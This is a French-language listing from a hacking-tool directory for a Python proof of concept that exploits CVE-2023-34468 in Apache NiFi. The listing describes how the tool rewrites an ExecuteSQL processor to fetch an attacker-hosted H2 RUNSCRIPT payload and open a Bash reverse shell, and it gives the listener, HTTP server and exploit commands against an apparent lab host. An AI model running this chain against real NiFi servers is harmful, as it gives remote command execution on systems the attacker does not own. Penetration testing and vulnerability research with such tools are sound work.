Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Outils/GitHubGitHub/ozcanpng/cve-2023-34468
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Voir le dépôt
3il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Petite preuve de concept en Python pour abuser d'un processeur ExecuteSQL Apache NiFi modifiable avec une charge utile H2 RUNSCRIPT afin de déclencher l'exécution de commandes à distance via un reverse shell Bash.

Uniquement pour les tests autorisés et la recherche. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


Ce qu'il fait

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Découvre automatiquement un seul processeur ExecuteSQL, ou accepte --processor-id manuellement.
  2. Écrit une charge utile locale rce.sql qui définit et appelle un alias d'exécution de shell basé sur Java.
  3. Vous invite à démarrer votre propre écouteur nc et serveur HTTP.
  4. Met à jour la requête du processeur pour récupérer rce.sql via H2 RUNSCRIPT.
Télécharger l’outil
  • Démarre le processeur pour déclencher le reverse shell.
  • Restaure la configuration originale du processeur après que vous ayez confirmé que le shell est arrivé.

  • Captures d'écran

    1. Configuration

    Configuration

    2. Requête vers la charge utile

    Exécution de l'exploit

    3. Shell reçu

    Mise à jour du processeur

    4. Résultat

    Résultat


    Configuration

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    Utilisation

    Terminal 1 :

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Terminal 2, depuis le répertoire de ce dépôt :

    root@kitploit:~
    python3 -m http.server 8000
    

    Terminal 3 :

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    Pour la sélection manuelle du processeur :

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    Affecté

    ProduitVersion affectéeAccès requisImpact
    Apache NiFiDéploiements affectés par CVE-2023-34468 utilisant le comportement modifiable ExecuteSQL/H2Capacité d'atteindre et de modifier le processeur NiFi cible via l'APIExécution de commandes à distance

    Remarques

    • Le script suppose que l'API NiFi est accessible et que l'utilisateur/session actuel peut modifier le processeur cible.
    • Le fichier rce.sql généré est ignoré par git et doit être servi depuis le répertoire du dépôt avec python3 -m http.server.
    • Si la découverte automatique ne trouve aucun processeur ou plusieurs candidats, passez l'UUID du processeur manuellement avec --processor-id.
    • Le script tente de restaurer la configuration originale du processeur ExecuteSQL après que vous ayez confirmé que le shell est arrivé.

    Références

    • NVD — CVE-2023-34468
    • Apache NiFi
    • Commandes de la base de données H2

    Auteur

    ozcanpng — github.com/ozcanpng — ozcanpng.dev